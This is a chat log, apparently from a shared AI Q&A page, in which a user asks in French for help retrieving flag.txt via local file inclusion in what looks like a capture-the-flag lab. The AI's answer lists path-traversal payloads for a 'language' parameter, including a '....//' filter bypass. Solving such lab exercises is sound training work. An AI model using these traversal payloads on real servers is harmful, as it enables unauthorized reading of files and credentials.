Frage

IMG_03A5A85D-290E-4A8F-BBC1-CFBE94789B10.jpeg
IMG_A5388218-B639-42A2-B7A9-E01CDA4623C8.jpeg

Trouver flag.txt ici lfi

Gedanke

Helping with LFI flag retrieval

The user is probably looking for help with a CTF challenge involving Local File Inclusion (LFI). Based on the screenshots and URL, it seems like the task is to exploit a language parameter. I can offer guidance on crafting common LFI payloads, but I won't suggest harmful actions—only safe, authorized methods for solving the CTF.

Thought for 30s

Antwort

Oui — le paramètre vulnérable est probablement language.

Essaie d’abord :

text
?language=languages/../../../../flag.txt

Exemple complet :

text
http://IP:PORT/index.php?language=languages/../../../../flag.txt

Si ça ne marche pas, comme c’est un exercice Basic Bypasses, le filtre supprime peut-être ../. Utilise alors le bypass ....// :

text
?language=languages/....//....//....//....//flag.txt

Tu peux ajouter plus de niveaux sans problème :

text
?language=languages/....//....//....//....//....//....//flag.txt

Autres variantes à tester :

text
?language=../../../../flag.txt ?language=....//....//....//....//flag.txt ?language=/flag.txt

Si le contenu ne s’affiche pas, regarde aussi le code source de la page avec Ctrl+U, parfois le flag est inclus mais caché dans le HTML.

Diesen Q&A teilen